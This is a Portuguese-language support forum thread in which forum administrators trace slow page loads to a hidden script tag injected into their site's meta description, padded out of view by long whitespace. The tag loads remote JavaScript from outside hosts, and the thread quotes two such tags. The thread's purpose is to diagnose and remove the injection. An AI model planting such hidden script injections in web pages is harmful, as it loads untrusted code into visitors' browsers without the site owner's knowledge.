Carregamento lento

+4
Sennior
empoleonmega1
Konai
Aru!
8 participantes

Ver o tópico anterior Ver o tópico seguinte Ir para baixo

Tópico resolvido Carregamento lento

Mensagem por Aru! 04.03.15 23:05

Detalhes da dúvida


Versão do fórum : phpBB3
Nível de acesso : Administrador
Navegador usado : Mozilla Firefox
Membros afetados : Todos os membros do fórum
Problema começou : Semana passada
Endereço do fórum : zapping.forumais.com

Descrição do problema

Boa noite,
Estou com problemas no carregamento de páginas do meu Fórum. Demora quase um minuto a abrir cada página.

Não fiz qualquer alteração de código nem nada.

Podem ajudar-me?
Aru!

Aru!
Nível 2

Masculino
Membro desde : 26/09/2013
Mensagens : 10
Pontos : 18

http://televisao.foruns.com.pt/

Ir para o topo Ir para baixo

Principal contribuidor

Tópico resolvido Re: Carregamento lento

Mensagem por Konai 04.03.15 23:13

Saudações!

Primeiramente:
Carregamento lento Logo
Seja bem-vindo ao nosso fórum de Suporte! Como acabou de se inscrever, veja aqui alguns links importantes a saber:

Em relação ao teu problema, vários outros(as) administradores(as) estão enfrentando o mesmo problema. Suponho eu que tenha sido após a manutenção nos servidores Forumeiros no dia 26/02. Peço a senhorita seja paciente e aguarde!

Se começou recentemente, não há dúvidas que esteja relacionado à isto, mas caso já tenha começado antes, tente limpar o cachê, utilizar o antivírus no seu computador e desabilitar o gerenciamento de códigos JavaScript no CPainel do teu fórum, caso houver. Positivo

Até! Muito feliz
Konai

Konai
Principal contribuidor
Principal contribuidor

Masculino
Membro desde : 07/08/2010
Mensagens : 6045
Pontos : 7550

http://narutongo.forumeiros.com/

Ir para o topo Ir para baixo

Tópico resolvido Re: Carregamento lento

Mensagem por empoleonmega1 05.03.15 2:48

Sinto que o senhor engraçadinho que estava implantando scripts via MP atacou novamente... aconteceu com o meu fórum e fui verificar o código fonte do seu e está igual.

Código:
<meta name="description" content="Sintonize-se. . . e discuta televisão!                                                                                                                                                                       <script src=//xmlfeed2.6te.net/s></script>">

Aparentemente a MP adiciona esse código extra na descrição do fórum, você perde a vida procurando de onde ele veio e ele estava debaixo do nariz.

No caso do seu está para um link aparentemente offline, já no meu estava o seguinte:

Código:
<script src=//swff.byethost4.com/l></script>

Que aparentemente foi feito pra injetar propagandas.
empoleonmega1

empoleonmega1
Nível 1

Masculino
Membro desde : 30/10/2013
Mensagens : 2
Pontos : 4

http://www.pokemonmythology.org/

Ir para o topo Ir para baixo

Membro profissional

Tópico resolvido Re: Carregamento lento

Mensagem por Sennior 05.03.15 3:00

Sim o senhor esta certo caro @empoleonmega1! Muito feliz

Autor, pelas informações passadas pelo nosso amigo, o código parece estar na descrição de teu fórum. Por gentileza, poderia ir em:
Painel de Controle Seta Geral Seta Fórum Seta Configuração
No campo Descrição do Site apague tudo que estiver lá por gentileza.

Até mais.
Sennior

Sennior
Membro profissional
Membro profissional

Masculino
Membro desde : 10/06/2011
Mensagens : 16378
Pontos : 20891

https://ajuda.forumeiros.com/forum https://www.facebook.com/GladstonHenriq https://twitter.com/UmGladston

Ir para o topo Ir para baixo

Tópico resolvido Re: Carregamento lento

Mensagem por CALIL 05.03.15 15:45

Tive exatamente o mesmo problema e a solução foi a mesma. foi um ataque hacker isso então.
CALIL

CALIL
Nível 1

Masculino
Membro desde : 10/11/2010
Mensagens : 4
Pontos : 6

http://arcobrasil.forumeiros.com/

Ir para o topo Ir para baixo

Tópico resolvido Re: Carregamento lento

Mensagem por Antonio Vieira Sobrinho 05.03.15 17:33

Tivemos este mesmo problema em nosso fórum e seguindo os passos acima foi resolvido, valeu pelas dicas!
Antonio Vieira Sobrinho

Antonio Vieira Sobrinho
Nível 9

Masculino
Membro desde : 11/10/2008
Mensagens : 161
Pontos : 237

http://www.forumpcbrasil.com

Ir para o topo Ir para baixo

Tópico resolvido Re: Carregamento lento

Mensagem por Chrono Trigger 05.03.15 18:06

Também estava com o mesmo problema, eu utilizo código de banner do portal se alternar a cada vez que atualiza a página, e tinha informações a mais, deletei e resolveu.

Abraços!!!
Chrono Trigger

Chrono Trigger
Nível 9

Masculino
Membro desde : 09/04/2010
Mensagens : 203
Pontos : 295

http://clothmythrevolution.com/portal.htm

Ir para o topo Ir para baixo

Tópico resolvido Re: Carregamento lento

Mensagem por Antonio Vieira Sobrinho 05.03.15 18:10

Agora o problema é aqui no Fórum dos Fóruns: Estou tentando criar um novo tópico com uma dúvida aqui no fórum e não está sendo possível. Preencho todos os campos e informações pedidas e quando vou criar o tópico fica só um retângulo com a mensagem CARRREGANDO e não sai disto, não cria-se nunca este novo tópico. Tentei tanto no Google Chrome quanto no Firefox e no Opera e está com este mesmo erro. E já tem vários minutos que está nesta mensagem e não cria o tópico. Como fazer neste caso?
Antonio Vieira Sobrinho

Antonio Vieira Sobrinho
Nível 9

Masculino
Membro desde : 11/10/2008
Mensagens : 161
Pontos : 237

http://www.forumpcbrasil.com

Ir para o topo Ir para baixo

Principal contribuidor

Tópico resolvido Re: Carregamento lento

Mensagem por Konai 05.03.15 18:12

Saudações Antonio Vieira Sobrinho!

Já tentou esvaziar o cachê do teu navegador? Pensativo

Até! Muito feliz
Konai

Konai
Principal contribuidor
Principal contribuidor

Masculino
Membro desde : 07/08/2010
Mensagens : 6045
Pontos : 7550

http://narutongo.forumeiros.com/

Ir para o topo Ir para baixo

Tópico resolvido Re: Carregamento lento

Mensagem por Antonio Vieira Sobrinho 05.03.15 18:20

Acabei de limpar o cachê e limpar completamente o navegador e continua com o mesmo problema, creio que o problema esteja realmente aqui no Fórum dos Fóruns
Antonio Vieira Sobrinho

Antonio Vieira Sobrinho
Nível 9

Masculino
Membro desde : 11/10/2008
Mensagens : 161
Pontos : 237

http://www.forumpcbrasil.com

Ir para o topo Ir para baixo

Principal contribuidor

Tópico resolvido Re: Carregamento lento

Mensagem por Konai 05.03.15 18:45

Peço que aguarde o @Shek ou um dos Moderadeiros @Sennior e @iSoul se pronunciar! Vou enviar um alerta para eles. Positivo
Konai

Konai
Principal contribuidor
Principal contribuidor

Masculino
Membro desde : 07/08/2010
Mensagens : 6045
Pontos : 7550

http://narutongo.forumeiros.com/

Ir para o topo Ir para baixo

Tópico resolvido Re: Carregamento lento

Mensagem por Antonio Vieira Sobrinho 05.03.15 18:45

Valeu, Hakuouki. Obrigado!
Antonio Vieira Sobrinho

Antonio Vieira Sobrinho
Nível 9

Masculino
Membro desde : 11/10/2008
Mensagens : 161
Pontos : 237

http://www.forumpcbrasil.com

Ir para o topo Ir para baixo

Principal contribuidor

Tópico resolvido Re: Carregamento lento

Mensagem por Konai 05.03.15 22:22

Antonio Vieira Sobrinho escreveu:Valeu, Hakuouki. Obrigado!
Querido,

Isto está ocorrendo, pois foi permitido pela administração a criação. Em breve arrumaremos isto! Positivo

Tópico movido de "Outras questões" para "Problemas de conexão"

Até! Muito feliz
Konai

Konai
Principal contribuidor
Principal contribuidor

Masculino
Membro desde : 07/08/2010
Mensagens : 6045
Pontos : 7550

http://narutongo.forumeiros.com/

Ir para o topo Ir para baixo

Tópico resolvido Forum lento, parado

Mensagem por fjmr123 06.03.15 0:09

Detalhes da dúvida


Versão do fórum : phpBB2
Nível de acesso : Administrador
Navegador usado : Mozilla Firefox, Google Chrome, Internet Explorer, Opera, Safari
Membros afetados : Todos os membros do fórum
Problema começou : Está muito lento, por vezes parado, faz 2 dias
Endereço do fórum : http://www.peixefauna.com/

Descrição do problema

Bom dia, meu forum faz dois dias que está super lento. Entro aparece apenas o logo e a página em branco, passado uns 20, 30 segundos abre totalmente, entro num subforum, aparece o logotipo e página em branco, aguardo 20 segundos e aparece tudo de repente, depois tento criar um tópico, acontece o mesmo e sempre assim. Eu li algures que houve actualização do servidor, meu forum não foi mexido por nós à muito tempo, não alteramos nada, peço a vossa ajuda, pois está impossível qualquer usuário fazer qualquer coisa. Desde já agradeço a ajuda que seja possível.
fjmr123

fjmr123
Novo membro

Masculino
Membro desde : 05/03/2015
Mensagens : 1
Pontos : 3

http://www.peixefauna.com/

Ir para o topo Ir para baixo

Principal contribuidor

Tópico resolvido Re: Carregamento lento

Mensagem por Konai 06.03.15 1:16

Saudações!

Primeiramente:
Carregamento lento Logo
Seja bem-vindo ao nosso fórum de Suporte! Como acabou de se inscrever, veja aqui alguns links importantes a saber:

Visto que temos outra questão pendente com o mesmo problema em questão, estarei fundindo o seu tópico com este: seta1 Carregamento lento

Peço atenção nas seguintes mensagens: seta1 Hakuouki
seta1 Sennior

Tópico movido de "Outras questões" para "Problemas de conexão"
Tópico fundido

Atenciosamente,
Hakuouki Piscada
Konai

Konai
Principal contribuidor
Principal contribuidor

Masculino
Membro desde : 07/08/2010
Mensagens : 6045
Pontos : 7550

http://narutongo.forumeiros.com/

Ir para o topo Ir para baixo

Membro profissional

Tópico resolvido Re: Carregamento lento

Mensagem por Sennior 09.03.15 4:20

Questão marcada como Resolvida ou o Autor solicitou que ela fosse arquivada.
Tópico marcado como Resolvido e movido para Questões resolvidas.
Sennior

Sennior
Membro profissional
Membro profissional

Masculino
Membro desde : 10/06/2011
Mensagens : 16378
Pontos : 20891

https://ajuda.forumeiros.com/forum https://www.facebook.com/GladstonHenriq https://twitter.com/UmGladston

Ir para o topo Ir para baixo

Ver o tópico anterior Ver o tópico seguinte Ir para o topo

- Tópicos semelhantes

Permissões neste sub-fórum
Não podes responder a tópicos